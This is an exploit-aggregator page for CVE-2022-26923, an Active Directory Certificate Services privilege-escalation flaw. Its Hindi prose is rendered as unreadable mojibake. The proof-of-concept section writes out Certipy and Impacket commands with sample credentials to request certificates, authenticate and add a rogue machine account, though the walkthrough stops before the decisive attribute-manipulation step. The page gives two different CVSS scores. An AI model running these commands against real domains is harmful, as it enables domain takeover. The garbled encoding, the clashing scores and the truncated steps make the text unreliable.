Sploitus

Exploit for CVE-2022-26923_AD-Certificate-Services

kitploit ┬╖ 2026-08-19

Exploit Code

MARKDOWN84 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LUDOVICPATHO-CVE-2022-26923_AD-CERTIFICATE-SERVICES
# CVE-2022-26923 AD Certificate Services

  * **рдкреНрд░рдХрд╛рд╢рди рдХреА рддрд┐рдерд┐** : 10/05/2022
  * рд╣рдорд▓реЗ рдХреА рдЬрдЯрд┐рд▓рддрд╛: рдирд┐рдореНрди
  * рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░: рдирд┐рдореНрди
  * **CVSS рд╕реНрдХреЛрд░ :** 8.1



рдЗрд╕ рдХрдордЬреЛрд░реА рдиреЗ рдПрдХ рдирд┐рдореНрди-рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ, Active Directory Certificate Services (AD CS) рд╕рд░реНрд╡рд░ рднреВрдорд┐рдХрд╛ рд╕реНрдерд╛рдкрд┐рдд рдбрд┐рдлрд╝реЙрд▓реНрдЯ Active Directory рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ, рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреАред

Oliver Lyak (ly4k_) рджреНрд╡рд╛рд░рд╛ Python рдореЗрдВ рдПрдХ рд╢реЛрд╖рдг (exploit) рд╡рд┐рдХрд╕рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдФрд░ рдЗрд╕реЗ рдкрд░рд╛рдорд░реНрд╢ рд╕реЗ рдкрд╣рд▓реЗ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рдмрд╛рдж рдореЗрдВ рдирд╣реАрдВред рдЗрд╕реЗ рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛ (proof-of-concept) рдШреЛрд╖рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдпрд╣ рд╢реЛрд╖рдг research.ifcr.dk рдкрд░ рдбрд╛рдЙрдирд▓реЛрдб рдХреЗ рд▓рд┐рдП рдЙрдкрд▓рдмреНрдз рд╣реИред

**рд╕реНрд░реЛрдд :**

  * https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923
  * https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
  * https://vuldb.com/fr/?id.199368



## рд╡рд┐рд╡рд░рдг

рд╣рд╛рд▓ рд╣реА рдореЗрдВ рд╕рд╛рдордиреЗ рдЖрдпрд╛ Active Directory Domain рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдЙрдиреНрдирдпрди рджреЛрд╖ рдЕрднреА рддрдХ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рджреБрдирд┐рдпрд╛ рдореЗрдВ рд╢реЛрд╖рд┐рдд рдирд╣реАрдВ рд╣реБрдЖ рд╣реИ, рдлрд┐рд░ рднреА рдЗрд╕рдХрд╛ рдЙрдЪреНрдЪ 8.8 CVSS рд╕реНрдХреЛрд░ рд╕рдордЭреМрддрд╛ рдХрд┐рдП рдЧрдП рд╕рд┐рд╕реНрдЯрдореЛрдВ рдХреЗ рд▓рд┐рдП рдЙрдЪреНрдЪ рдЬреЛрдЦрд┐рдо рдХреА рдУрд░ рд╕рдВрдХреЗрдд рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╣рдорд▓рд╛рд╡рд░ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдореБрджреНрджреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред CVE-2022тАУ26923 DnsHostName рд╡рд┐рд╢реЗрд╖рддрд╛ рдореЗрдВ рд╣реЗрд░рдлреЗрд░ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬреЛ рдХрдВрдкреНрдпреВрдЯрд░ рдирд╛рдо рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреА рд╣реИ рдЬреИрд╕рд╛ рдХрд┐ DNS рдореЗрдВ рдкрдВрдЬреАрдХреГрдд рд╣реИ, рдФрд░ рдлрд┐рд░ рдПрдХ рдкреНрд░рддрд┐рджреНрд╡рдВрджреНрд╡реА рдХреЛ AD Certificate Services рд╕реЗ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдмрдирд╛рддрд╛ рд╣реИ, рдЬреЛ рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдЙрдиреНрдирдпрди рдХреА рдУрд░ рд▓реЗ рдЬрд╛рддрд╛ рд╣реИред

## POC

root@kitploit:~
    
    
        - рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо: user_test
        - рдкрд╛рд╕рд╡рд░реНрдб: Password123#
        - рдбреЛрдореЗрди: my.domain.com
        
        рдкреБрдирд░реБрддреНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ рдпрд╣ рдХрд░рдирд╛ рд╣реЛрдЧрд╛: 
        - рд╣рдорд▓рд╛ рдХрд░рдиреЗ рд╡рд╛рд▓реА рдорд╢реАрди рдкрд░ impacket рдФрд░ certipy рд╕реНрдерд╛рдкрд┐рдд рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред
          - https://github.com/SecureAuthCorp/impacket
          - https://github.com/ly4k/Certipy
        - рдЖрдкрдиреЗ рдирд┐рдореНрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд┐рдпрд╛ рд╣реЛред 
        - рдХреЛрдИ рд╕рд┐рд╕реНрдЯрдо рдХреЗрд╡рд▓ рддрднреА рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИ рдЬрдм рдбреЛрдореЗрди рдкрд░ Active Directory Certificate Services рдЪрд▓ рд░рд╣реА рд╣реЛред
    

  1. рдЖрдЗрдП рдЕрдкрдиреЗ рдирд┐рдореНрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реЗ AD рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо=user_test рдкрд╛рд╕рд╡рд░реНрдб=Password123#) рдХреЗ рд▓рд┐рдП User рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЯреЗрдореНрдкрд▓реЗрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЙрддреНрдкрдиреНрди рдХрд░рдХреЗ рд╢реБрд░реВ рдХрд░реЗрдВ :

root@kitploit:~
         
         certipy req 'my.domain.com/user_test:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template User
         

  2. рдЖрдЗрдП рдЬрд╛рдБрдЪреЗрдВ рдХрд┐ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд╛рдиреНрдп рд╣реИ рдФрд░ Certipy рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ Kerberos рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рд▓рд┐рдП рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ :

root@kitploit:~
         
         certipy auth -pfx user_test.pfx
         

  3. Impacket рдХреЗ рд╕рд╛рде рдбреЛрдореЗрди рдореЗрдВ рдПрдХ рд╡рд░реНрдЪреБрдЕрд▓ рдХрдВрдкреНрдпреВрдЯрд░ рдЬреЛрдбрд╝рдирд╛

root@kitploit:~
         
         addcomputer.py 'my.domain.com/user_test:Password123#' -method LDAPS -computer-name 'NEW_PC' -computer-pass 'Password123#'
         
         # my.domain.com/user_test:Password123# - We need to provide valid AD credentials in order to add a new computer.
         # method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.
         # computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.
         # computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.
         

  4. рдЖрдЗрдП рд╣рдорд╛рд░реЗ рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдП рдЧрдП рдирдП рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рд▓рд┐рдП рдПрдХ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВред рдЙрдХреНрдд рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ рдирд╛рдо рдХреЗ рдЕрдВрдд рдореЗрдВ "$" рдЬреЛрдбрд╝рдирд╛ рд╣реЛрдЧрд╛:

root@kitploit:~
         
         certipy req 'my.domain.com/NEW_PC$:Password123#@hostname.my.domain.com' -ca MY-DOMAIN-HOSTNAME-CA -template Machine
         




## рд╢рдорди рдФрд░ рд╕реБрдзрд╛рд░

CVE-2022тАУ26923 рдХреЗ рд╢рдорди рдФрд░ рд╕реБрд░рдХреНрд╖рд╛рддреНрдордХ рдЙрдкрд╛рдпреЛрдВ рдХреЗ рд▓рд┐рдП, Microsoft рджреГрдврд╝рддрд╛ рд╕реЗ рдЕрдиреБрд╢рдВрд╕рд╛ рдХрд░рддрд╛ рд╣реИ рдХрд┐ AD Certificate Services рдЪрд▓рд╛рдиреЗ рд╡рд╛рд▓реЗ рд╕рднреА рд╕рд░реНрд╡рд░реЛрдВ рдФрд░ рдкреНрд░рдорд╛рдгрдкрддреНрд░-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реЗ Windows рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХреЛрдВ рдХреЛ рдирд╡реАрдирддрдо 10 рдордИ рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдЕрдкрдбреЗрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдПред

  * https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923